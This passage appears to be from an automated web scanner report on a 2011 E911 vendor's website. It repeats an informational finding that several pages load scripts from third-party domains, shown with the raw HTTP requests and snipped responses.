Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/e911_information_center/
Cookie: tz=5; ASP.NET_SessionId=1bw3xe552lbj2j551tb0bb55; kilo_boat_cid=911078775; tz=5; __utma=112137735.110952242.1305162418.1305162418.1305162418.1; __utmb=112137735.3.10.1305162418; __utmc=112137735; __utmz=112137735.1305162418.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=a449df2-12fe1be4def-5e2048d0-2

Response

HTTP/1.1 404 Page Not Found
Date: Thu, 12 May 2011 01:08:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16414

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Page Not Found : RedSky - The leader in E911 solutions
</title><link rel="stylesheet" type="text/css" media="print" href="/common/style-
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en"></script>
...[SNIP]...
</style>

<script src="http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en" type="text/javascript"></script>
<script src="http://www.google.com/cse/api/overlay.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" charset="utf-8" src="http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com"></script>
...[SNIP]...
<li><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&popup=true"></script>
...[SNIP]...

19.33. http://www.redskye911.com/e911_products/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/e911_products/

Issue detail

The response dynamically includes the following scripts from other domains:

http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&popup=true
http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com
http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en
http://www.google.com/cse/api/overlay.js
http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en

Request

GET /e911_products/ HTTP/1.1
Host: www.redskye911.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/
Cookie: ASP.NET_SessionId=1bw3xe552lbj2j551tb0bb55; kilo_boat_cid=911078775; tz=5; __utma=112137735.110952242.1305162418.1305162418.1305162418.1; __utmb=112137735.1.10.1305162418; __utmc=112137735; __utmz=112137735.1305162418.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:07:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 20936

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
E911 Products :: RedSky :: The Leader in E911 Solutions
</title><link rel="stylesheet" type="text/css" media="print" href="/common/style
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en"></script>
...[SNIP]...
</style>

<script src="http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en" type="text/javascript"></script>
<script src="http://www.google.com/cse/api/overlay.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" charset="utf-8" src="http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com"></script>
...[SNIP]...
<li><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&popup=true"></script>
...[SNIP]...

19.34. http://www.redskye911.com/e911_products/e911_anywhere/hosted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/e911_products/e911_anywhere/hosted/

Issue detail

The response dynamically includes the following scripts from other domains:

http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&popup=true
http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com
http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en
http://www.google.com/cse/api/overlay.js
http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en

Request

GET /e911_products/e911_anywhere/hosted/ HTTP/1.1
Host: www.redskye911.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/e911_information_center/e911_hosted_solutions/
Cookie: tz=5; ASP.NET_SessionId=1bw3xe552lbj2j551tb0bb55; kilo_boat_cid=911078775; tz=5; __utma=112137735.110952242.1305162418.1305162418.1305162418.1; __utmb=112137735.6.10.1305162418; __utmc=112137735; __utmz=112137735.1305162418.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=a449df2-12fe1be4def-5e2048d0-4

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:09:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19813

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
E911 Anywhere.. Hosted :: Products - RedSky :: The Leader in E911 Solutions
</title><link rel="stylesheet" type="text/css" media="print"
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en"></script>
...[SNIP]...
</style>

<script src="http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en" type="text/javascript"></script>
<script src="http://www.google.com/cse/api/overlay.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" charset="utf-8" src="http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com"></script>
...[SNIP]...
<li><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&popup=true"></script>
...[SNIP]...

19.35. http://www.redskye911.com/e911_products/e911_anywhere/hosted/loadingAnimation.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/e911_products/e911_anywhere/hosted/loadingAnimation.gif

Issue detail

The response dynamically includes the following scripts from other domains:

http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&popup=true
http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com
http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en
http://www.google.com/cse/api/overlay.js
http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en

Request

GET /e911_products/e911_anywhere/hosted/loadingAnimation.gif HTTP/1.1
Host: www.redskye911.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/e911_products/e911_anywhere/hosted/
Cookie: tz=5; tz=5; ASP.NET_SessionId=1bw3xe552lbj2j551tb0bb55; kilo_boat_cid=911078775; tz=5; __utma=112137735.110952242.1305162418.1305162418.1305162418.1; __utmb=112137735.7.10.1305162418; __utmc=112137735; __utmz=112137735.1305162418.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=a449df2-12fe1be4def-5e2048d0-5

Response

HTTP/1.1 404 Page Not Found
Date: Thu, 12 May 2011 01:09:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16429

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Page Not Found : RedSky - The leader in E911 solutions
</title><link rel="stylesheet" type="text/css" media="print" href="/common/style-
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en"></script>
...[SNIP]...
</style>

<script src="http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en" type="text/javascript"></script>
<script src="http://www.google.com/cse/api/overlay.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" charset="utf-8" src="http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com"></script>
...[SNIP]...
<li><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&popup=true"></script>
...[SNIP]...

19.36. http://www.redskye911.com/e911_products/e911_anywhere/hosted/purchasing/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/e911_products/e911_anywhere/hosted/purchasing/

Issue detail

The response dynamically includes the following scripts from other domains:

http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&popup=true
http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com
http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en
http://www.google.com/cse/api/overlay.js
http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en

Request

GET /e911_products/e911_anywhere/hosted/purchasing/ HTTP/1.1
Host: www.redskye911.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/e911_products/e911_anywhere/hosted/
Cookie: tz=5; tz=5; ASP.NET_SessionId=1bw3xe552lbj2j551tb0bb55; kilo_boat_cid=911078775; tz=5; __utma=112137735.110952242.1305162418.1305162418.1305162418.1; __utmb=112137735.7.10.1305162418; __utmc=112137735; __utmz=112137735.1305162418.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=a449df2-12fe1be4def-5e2048d0-5

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:09:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18824

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
E911 Anywhere.. Hosted :: Purchasing :: Products - RedSky :: The Leader in E911 Solutions
</title><link rel="stylesheet" type="text/css"
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en"></script>
...[SNIP]...
</style>

<script src="http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en" type="text/javascript"></script>
<script src="http://www.google.com/cse/api/overlay.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" charset="utf-8" src="http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com"></script>
...[SNIP]...
<li><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&popup=true"></script>
...[SNIP]...

19.37. http://www.redskye911.com/e911_products/e911_anywhere/hosted/purchasing/loadingAnimation.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/e911_products/e911_anywhere/hosted/purchasing/loadingAnimation.gif

Issue detail

The response dynamically includes the following scripts from other domains:

http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&popup=true
http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com
http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en
http://www.google.com/cse/api/overlay.js
http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en

Request

GET /e911_products/e911_anywhere/hosted/purchasing/loadingAnimation.gif HTTP/1.1
Host: www.redskye911.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/e911_products/e911_anywhere/hosted/purchasing/
Cookie: tz=5; tz=5; tz=5; ASP.NET_SessionId=1bw3xe552lbj2j551tb0bb55; kilo_boat_cid=911078775; tz=5; __utma=112137735.110952242.1305162418.1305162418.1305162418.1; __utmb=112137735.8.10.1305162418; __utmc=112137735; __utmz=112137735.1305162418.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=a449df2-12fe1be4def-5e2048d0-6

Response

HTTP/1.1 404 Page Not Found
Date: Thu, 12 May 2011 01:09:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16442

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Page Not Found : RedSky - The leader in E911 solutions
</title><link rel="stylesheet" type="text/css" media="print" href="/common/style-
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en"></script>
...[SNIP]...
</style>

<script src="http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en" type="text/javascript"></script>
<script src="http://www.google.com/cse/api/overlay.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" charset="utf-8" src="http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com"></script>
...[SNIP]...
<li><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&popup=true"></script>
...[SNIP]...

19.38. http://www.redskye911.com/e911_products/e911_anywhere/network_services/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/e911_products/e911_anywhere/network_services/

Issue detail

The response dynamically includes the following scripts from other domains:

http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&popup=true
http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com
http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en
http://www.google.com/cse/api/overlay.js
http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en

Request

GET /e911_products/e911_anywhere/network_services/ HTTP/1.1
Host: www.redskye911.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/e911_information_center/e911_hosted_solutions/
Cookie: tz=5; ASP.NET_SessionId=1bw3xe552lbj2j551tb0bb55; kilo_boat_cid=911078775; tz=5; __utma=112137735.110952242.1305162418.1305162418.1305162418.1; __utmb=112137735.6.10.1305162418; __utmc=112137735; __utmz=112137735.1305162418.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=a449df2-12fe1be4def-5e2048d0-4

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:09:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19765

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
E911 Anywhere.. Network Services :: Products - RedSky :: The Leader in E911 Solutions
</title><link rel="stylesheet" type="text/css" med
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en"></script>
...[SNIP]...
</style>

<script src="http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en" type="text/javascript"></script>
<script src="http://www.google.com/cse/api/overlay.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" charset="utf-8" src="http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com"></script>
...[SNIP]...
<li><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&popup=true"></script>
...[SNIP]...

19.39. http://www.redskye911.com/e911_products/loadingAnimation.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/e911_products/loadingAnimation.gif

Issue detail

The response dynamically includes the following scripts from other domains:

http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&popup=true
http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com
http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en
http://www.google.com/cse/api/overlay.js
http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en

Request

GET /e911_products/loadingAnimation.gif HTTP/1.1
Host: www.redskye911.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/e911_products/
Cookie: tz=5; ASP.NET_SessionId=1bw3xe552lbj2j551tb0bb55; kilo_boat_cid=911078775; tz=5; __utma=112137735.110952242.1305162418.1305162418.1305162418.1; __utmb=112137735.2.10.1305162418; __utmc=112137735; __utmz=112137735.1305162418.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=a449df2-12fe1be4def-5e2048d0-1

Response

HTTP/1.1 404 Page Not Found
Date: Thu, 12 May 2011 01:07:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16404

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Page Not Found : RedSky - The leader in E911 solutions
</title><link rel="stylesheet" type="text/css" media="print" href="/common/style-
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en"></script>
...[SNIP]...
</style>

<script src="http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en" type="text/javascript"></script>
<script src="http://www.google.com/cse/api/overlay.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" charset="utf-8" src="http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com"></script>
...[SNIP]...
<li><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&popup=true"></script>
...[SNIP]...

19.40. http://www.redskye911.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&popup=true
http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com
http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en
http://www.google.com/cse/api/overlay.js
http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en

Request

GET /favicon.ico HTTP/1.1
Host: www.redskye911.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ASP.NET_SessionId=1bw3xe552lbj2j551tb0bb55; kilo_boat_cid=911078775; tz=5; __utma=112137735.110952242.1305162418.1305162418.1305162418.1; __utmb=112137735.1.10.1305162418; __utmc=112137735; __utmz=112137735.1305162418.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Page Not Found
Date: Thu, 12 May 2011 01:07:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16379

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Page Not Found : RedSky - The leader in E911 solutions
</title><link rel="stylesheet" type="text/css" media="print" href="/common/style-
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en"></script>
...[SNIP]...
</style>

<script src="http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en" type="text/javascript"></script>
<script src="http://www.google.com/cse/api/overlay.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" charset="utf-8" src="http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com"></script>
...[SNIP]...
<li><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&popup=true"></script>
...[SNIP]...

19.41. http://www.redskye911.com/knowledge_base/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/knowledge_base/

Issue detail

The response dynamically includes the following scripts from other domains:

http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&popup=true
http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com
http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en
http://www.google.com/cse/api/overlay.js
http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en

Request

GET /knowledge_base/ HTTP/1.1
Host: www.redskye911.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/
Cookie: ASP.NET_SessionId=1bw3xe552lbj2j551tb0bb55; kilo_boat_cid=911078775; tz=5; __utma=112137735.110952242.1305162418.1305162418.1305162418.1; __utmb=112137735.1.10.1305162418; __utmc=112137735; __utmz=112137735.1305162418.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:07:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25930

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Knowledge Base - RedSky :: The Leader in E911 Solutions
</title><link rel="stylesheet" type="text/css" media="print" href="/common/style
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en"></script>
...[SNIP]...
</style>

<script src="http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en" type="text/javascript"></script>
<script src="http://www.google.com/cse/api/overlay.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" charset="utf-8" src="http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com"></script>
...[SNIP]...
<li><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&popup=true"></script>
...[SNIP]...

19.42. http://www.redskye911.com/knowledge_base/loadingAnimation.gif previous next

Summary

